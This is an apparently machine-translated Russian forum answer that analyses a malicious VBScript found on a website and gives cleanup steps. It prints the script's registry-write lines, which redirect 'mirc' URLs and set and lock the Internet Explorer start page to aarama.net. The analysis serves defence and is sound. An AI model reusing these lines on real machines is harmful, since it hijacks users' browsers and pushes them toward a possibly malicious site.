Я не говорю много сценариев, но намерения этого, кажется, в основном ясны.
Set shell = CreateObject("WScript.Shell")
Первая строка, я не совсем уверен. Тем не менее, некоторые поиски в Google, кажется, подтверждают мои мысли о том, что это довольно стандартная начальная строка для сценария.
Остальные строки, кажется, устанавливают различные ключи реестра.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"
Этот добавляет новый префикс URL в Internet Explorer. По сути, каждый раз, когда IE говорят запрашивать ресурс, начинающийся с «mirc». и протокол не указан, он вставит « http://aarama.net/ » перед адресом перед его обработкой. Поэтому, если вы введете «mirc.google.com» в адресную строку, IE переведет его на « http://aarama.net/mirc.google.com ». Это, вероятно, помогает функционировать другим сценариям на вредоносном сайте (или загруженным вредоносным программам).
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
Они добавляют разделы реестра, которые обычно реализуют контроль групповой политики над Internet Explorer. Вы можете обнаружить, что больше не можете изменить свою домашнюю страницу IE через панель управления.
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
Они устанавливают « http://aarama.net/ » на вашу домашнюю страницу, гарантируя, что вы зайдете на сайт хотя бы один раз и получите возможность стать жертвой любого фишингового мошенничества или вредоносного кода. Конечно, предыдущие ключи гарантируют, что вы не просто зайдете один раз, так как вы не можете изменить домашнюю страницу.
self.Close
Опять же, я не говорю на скрипте. Но я думаю, что этот вполне очевидно заканчивает это.
Некоторые вещи, которые вы должны сделать с этой информацией:
1.) (Слишком поздно) Не заходите на этот сайт.
2.) Имейте несколько хороших антивирусных / антивирусных программ, копающихся на вашем компьютере. Мои рекомендации Avast! сканирование во время загрузки, Malwarebytes и SpyBot Search & Destroy. Если возможно, используйте отдельную, хорошо известную одноразовую машину для сканирования. Или получите хороший LiveCD для сканирования.
3.) Проверьте в реестре значения, созданные скриптом. Если они все еще там, сделайте резервную копию вашего реестра, затем удалите созданные значения или измените их на ваши предпочтительные настройки. Первые три должны быть просто сброшены. Последние два, установите ваши предпочтения или «about:blank».
4.) Если после этого вы заметили какие-либо подозрительные действия в вашей системе, пришло время для подхода "ядерное оружие с орбиты". Надеюсь, у вас есть хорошие резервные копии.
